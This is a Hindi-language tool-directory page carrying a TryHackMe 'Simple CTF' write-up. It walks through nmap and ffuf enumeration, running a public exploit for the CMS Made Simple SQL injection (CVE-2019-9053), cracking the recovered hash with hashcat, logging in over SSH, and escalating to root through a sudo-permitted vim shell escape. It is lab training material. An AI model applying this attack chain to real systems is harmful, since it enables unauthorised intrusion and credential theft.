Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Simple-CTF-Writeup — पेशेवर TryHackMe Simple CTF वॉकथ्रू जिसमें एन्यूमरेशन, CMS Made Simple SQL इंजेक्शन (CVE-2019-9053), क्रेडेंशियल रिकवरी, SSH एक्सेस, Vim के माध्यम से प्रिविलेज एस्केलेशन और रूट कंप्रोमाइज़ शामिल है। | Kitploit
उपकरण/GitHubGitHub/imperialx1104/simple-ctf-writeup
पासवर्ड क्रैकिंगविशेषाधिकार वृद्धिटोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHubimperialx1104/simple-ctf-writeup

Simple-CTF-Writeup

पेशेवर TryHackMe Simple CTF वॉकथ्रू जिसमें एन्यूमरेशन, CMS Made Simple SQL इंजेक्शन (CVE-2019-9053), क्रेडेंशियल रिकवरी, SSH एक्सेस, Vim के माध्यम से प्रिविलेज एस्केलेशन और रूट कंप्रोमाइज़ शामिल है।

रिपॉजिटरी देखें
43 महीने पहलेअभी तक समीक्षित नहीं

सिंपल-सीटीएफ-राइटअप

TryHackMe Simple CTF का पेशेवर वॉकथ्रू, जिसमें एन्यूमरेशन, CMS Made Simple SQL इंजेक्शन (CVE-2019-9053), क्रेडेंशियल रिकवरी, SSH एक्सेस, Vim के माध्यम से प्रिविलेज एस्केलेशन और रूट से समझौता शामिल है।

TryHackMe - Simple CTF राइटअप

TryHackMe के Simple CTF रूम का एक संपूर्ण वॉकथ्रू, जिसमें रिकॉनिसेंस, एन्यूमरेशन, एक्सप्लॉइटेशन, क्रेडेंशियल रिकवरी, प्रिविलेज एस्केलेशन और फ्लैग कैप्चर शामिल हैं।


रूम की जानकारी

फ़ील्डमान
प्लेटफ़ॉर्मTryHackMe
रूम का नामSimple CTF
कठिनाईआसान
श्रेणीवेब एक्सप्लॉइटेशन और लिनक्स प्रिविलेज एस्केलेशन
लेखकSaahil Gupta (ImperialX1104)

उद्देश्य

इस रूम का लक्ष्य है:

  • लक्ष्य मशीन का एन्यूमरेशन करना
  • छिपी हुई सेवाओं और एप्लिकेशन की खोज करना
  • एक संवेदनशील CMS का शोषण करना
  • क्रेडेंशियल पुनर्प्राप्त करना
  • SSH एक्सेस प्राप्त करना
  • रूट तक प्रिविलेज एस्केलेशन करना
  • दोनों फ्लैग कैप्चर करना

अटैक अवलोकन

root@kitploit:~
Host Discovery
      │
      ▼
Port Enumeration
      │
      ▼
Directory Enumeration
      │
      ▼
CMS Discovery
      │
      ▼
Version Identification
      │
      ▼
SQL Injection (CVE-2019-9053)
      │
      ▼
Credential Extraction
      │
      ▼
Password Cracking
      │
      ▼
SSH Access
      │
      ▼
User Flag
      │
      ▼
Privilege Escalation
      │
      ▼
Root Flag

रिकॉनिसेंस

होस्ट डिस्कवरी

पहला कदम लक्ष्य मशीन के साथ कनेक्टिविटी सत्यापित करना था।

कमांड

root@kitploit:~
ping 10.49.175.174

परिणाम

होस्ट ने सफलतापूर्वक प्रतिक्रिया दी, जिससे पुष्टि हुई कि यह पहुंच योग्य है।

स्क्रीनशॉट

पिंग स्कैन


पोर्ट एन्यूमरेशन

खुली सेवाओं की पहचान करने के लिए एक व्यापक Nmap स्कैन किया गया।

कमांड

root@kitploit:~
nmap -A -v 10.49.175.174

परिणाम

पोर्टसेवासंस्करण
21FTPvsftpd 3.0.3
80HTTPApache 2.4.18
2222SSHOpenSSH 7.2p2

उल्लेखनीय निष्कर्ष

  • अनाम (एनोनिमस) FTP लॉगिन सक्षम
  • Apache वेब सर्वर चालू
  • SSH पोर्ट 2222 पर उपलब्ध
  • robots.txt फ़ाइल खोजी गई

स्क्रीनशॉट

Nmap एन्यूमरेशन


वेब एन्यूमरेशन

लक्ष्य वेब सर्वर पर नेविगेट करने पर डिफ़ॉल्ट Apache लैंडिंग पेज प्रदर्शित हुआ।

URL

root@kitploit:~
http://10.49.175.174

स्क्रीनशॉट

Apache डिफ़ॉल्ट पेज

इस चरण में कोई स्पष्ट अटैक सरफेस दिखाई नहीं दे रहा था।


डायरेक्टरी एन्यूमरेशन

छिपे हुए संसाधनों की पहचान के लिए, FFUF का उपयोग करके डायरेक्टरी ब्रूट-फोर्सिंग की गई।

कमांड

root@kitploit:~
ffuf -u http://10.49.175.174/FUZZ \
-w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt \
-fc 200

परिणाम

root@kitploit:~
simple [Status: 301]

स्क्रीनशॉट

FFUF एन्यूमरेशन

/simple नामक एक डायरेक्टरी खोजी गई।


CMS की खोज

खोजी गई डायरेक्टरी पर ब्राउज़ करने से एक CMS इंस्टॉलेशन सामने आया।

URL

root@kitploit:~
http://10.49.175.174/simple

स्क्रीनशॉट

CMS Made Simple

पहचाना गया CMS

root@kitploit:~
CMS Made Simple 2.2.8

यह संस्करण संख्या बाद में महत्वपूर्ण साबित हुई।


भेद्यता अनुसंधान

CMS संस्करण पर SearchSploit का उपयोग करके शोध किया गया।

कमांड

root@kitploit:~
searchsploit "CMS Made Simple"

परिणाम

root@kitploit:~
CMS Made Simple < 2.2.10 - SQL Injection

स्क्रीनशॉट

SearchSploit परिणाम

एक ज्ञात SQL इंजेक्शन भेद्यता की पहचान की गई।


एक्सप्लॉइट प्राप्ति

विश्लेषण और निष्पादन के लिए एक्सप्लॉइट को स्थानीय रूप से कॉपी किया गया।

कमांड

root@kitploit:~
searchsploit -m 46635

आउटपुट

root@kitploit:~
CMS Made Simple < 2.2.10 - SQL Injection
CVE-2019-9053

स्क्रीनशॉट

एक्सप्लॉइट डाउनलोड


एक्सप्लॉइटेशन

सार्वजनिक रूप से उपलब्ध एक्सप्लॉइट को लक्ष्य CMS इंस्टेंस के विरुद्ध निष्पादित किया गया।

कमांड

root@kitploit:~
python3 exploit.py \
-u http://10.49.175.174/simple/ \
--crack \
-w /usr/share/wordlists/rockyou.txt

क्रेडेंशियल निष्कर्षण

एक्सप्लॉइट ने बैकएंड डेटाबेस से सफलतापूर्वक जानकारी निकाली।

आउटपुट

root@kitploit:~
[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: [email protected]

स्क्रीनशॉट

क्रेडेंशियल निष्कर्षण

पुनर्प्राप्त जानकारी

आइटममान
उपयोगकर्ता नामmitch
ईमेल[email protected]
सॉल्ट1dac0d92e9fa6bb2

पासवर्ड क्रैकिंग

निकाले गए हैश को Hashcat का उपयोग करके क्रैक किया गया।

कमांड

root@kitploit:~
hashcat -m 20 hash.txt --show

आउटपुट

root@kitploit:~
0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2:secret

पुनर्प्राप्त क्रेडेंशियल

फ़ील्डमान
उपयोगकर्ता नामmitch
पासवर्डsecret

स्क्रीनशॉट

Hashcat पासवर्ड रिकवरी


प्रारंभिक एक्सेस

पुनर्प्राप्त क्रेडेंशियल का SSH सेवा पर परीक्षण किया गया।

कमांड

root@kitploit:~
ssh [email protected] -p 2222

पासवर्ड

root@kitploit:~
secret

परिणाम

root@kitploit:~
Welcome to Ubuntu 16.04.6 LTS

स्क्रीनशॉट

SSH एक्सेस

सफल प्रमाणीकरण ने उपयोगकर्ता mitch के रूप में शेल एक्सेस प्रदान किया।


यूज़र फ्लैग

एक्सेस प्राप्त करने के बाद, यूज़र फ्लैग Mitch की होम डायरेक्टरी में स्थित पाया गया।

कमांड

root@kitploit:~
whoami
cd ~
cat user.txt

आउटपुट

root@kitploit:~
G00d j0b, keep up!

स्क्रीनशॉट

यूज़र फ्लैग


प्रिविलेज एस्केलेशन

सुडो एन्यूमरेशन

सुडो अनुमतियों की जाँच करने पर एक दिलचस्प कॉन्फ़िगरेशन का पता चला।

कमांड

root@kitploit:~
sudo -l

आउटपुट

root@kitploit:~
User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim

स्क्रीनशॉट

sudo -l आउटपुट

यह कॉन्फ़िगरेशन उपयोगकर्ता को पासवर्ड दिए बिना रूट विशेषाधिकारों के साथ Vim निष्पादित करने की अनुमति देता है।


रूट एक्सेस

रूट के रूप में Vim लॉन्च करना:

root@kitploit:~
sudo vim

चूँकि Vim उन्नत विशेषाधिकारों के साथ चल रहा था, इसका उपयोग रूट के स्वामित्व वाली फ़ाइलों तक पहुँचने के लिए किया जा सकता था।

स्क्रीनशॉट

Vim के माध्यम से रूट एक्सेस


रूट फ्लैग

रूट फ्लैग रूट उपयोगकर्ता की डायरेक्टरी में स्थित था।

कमांड

root@kitploit:~
:! cat /root/root.txt

आउटपुट

root@kitploit:~
W3ll d0n3. You made it!

स्क्रीनशॉट

रूट फ्लैग


कैप्चर किए गए फ्लैग

यूज़र फ्लैग

root@kitploit:~
G00d j0b, keep up!

रूट फ्लैग

root@kitploit:~
W3ll d0n3. You made it!

अटैक चेन सारांश

root@kitploit:~
Nmap Scan
    ↓
Web Enumeration
    ↓
Directory Discovery (/simple)
    ↓
CMS Made Simple 2.2.8
    ↓
SearchSploit Research
    ↓
CVE-2019-9053 SQL Injection
    ↓
Credential Extraction
    ↓
Hash Cracking
    ↓
SSH Login (mitch:secret)
    ↓
User Flag
    ↓
sudo -l
    ↓
Vim Privilege Escalation
    ↓
Root Flag

सीखे गए सबक

एन्यूमरेशन महत्वपूर्ण है

संवेदनशील CMS होमपेज पर दिखाई नहीं दे रहा था और इसे खोजने के लिए डायरेक्टरी एन्यूमरेशन की आवश्यकता थी।

संस्करण पहचान महत्वपूर्ण है

सटीक CMS संस्करण जानने से सीधे एक ज्ञात भेद्यता की पहचान हुई।

क्रेडेंशियल पुन: उपयोग

पुनर्प्राप्त क्रेडेंशियल का हमेशा सभी उपलब्ध सेवाओं पर परीक्षण किया जाना चाहिए।

सुडो गलत कॉन्फ़िगरेशन खतरनाक हैं

Vim जैसे एडिटर्स के विशेषाधिकार प्राप्त निष्पादन की अनुमति देना पूर्ण सिस्टम समझौते का कारण बन सकता है।


उपयोग किए गए उपकरण

  • Nmap
  • FFUF
  • SearchSploit
  • Python
  • Hashcat
  • SSH
  • Vim

निष्कर्ष

इस रूम ने प्रारंभिक एन्यूमरेशन से पूर्ण रूट समझौते तक की संपूर्ण अटैक चेन प्रदर्शित की। वेब एप्लिकेशन एन्यूमरेशन, SQL इंजेक्शन एक्सप्लॉइटेशन, पासवर्ड क्रैकिंग और लिनक्स प्रिविलेज एस्केलेशन तकनीकों के संयोजन से लक्ष्य सिस्टम पर पूर्ण नियंत्रण प्राप्त किया गया।

यह रूम वास्तविक दुनिया की पेनेट्रेशन टेस्टिंग पद्धति के लिए एक उत्कृष्ट परिचय के रूप में कार्य करता है तथा उचित सॉफ़्टवेयर पैचिंग, क्रेडेंशियल सुरक्षा और न्यूनतम-विशेषाधिकार एक्सेस नियंत्रण के महत्व को रेखांकित करता है।


लेखक

Saahil Gupta (ImperialX1104)

  • GitHub: https://github.com/ImperialX1104
  • TryHackMe: ImperialX

⭐ अगर आपको यह राइटअप उपयोगी लगा, तो रिपॉज़िटरी को स्टार करने और GitHub पर मुझसे जुड़ने पर विचार करें।

टूल डाउनलोड करें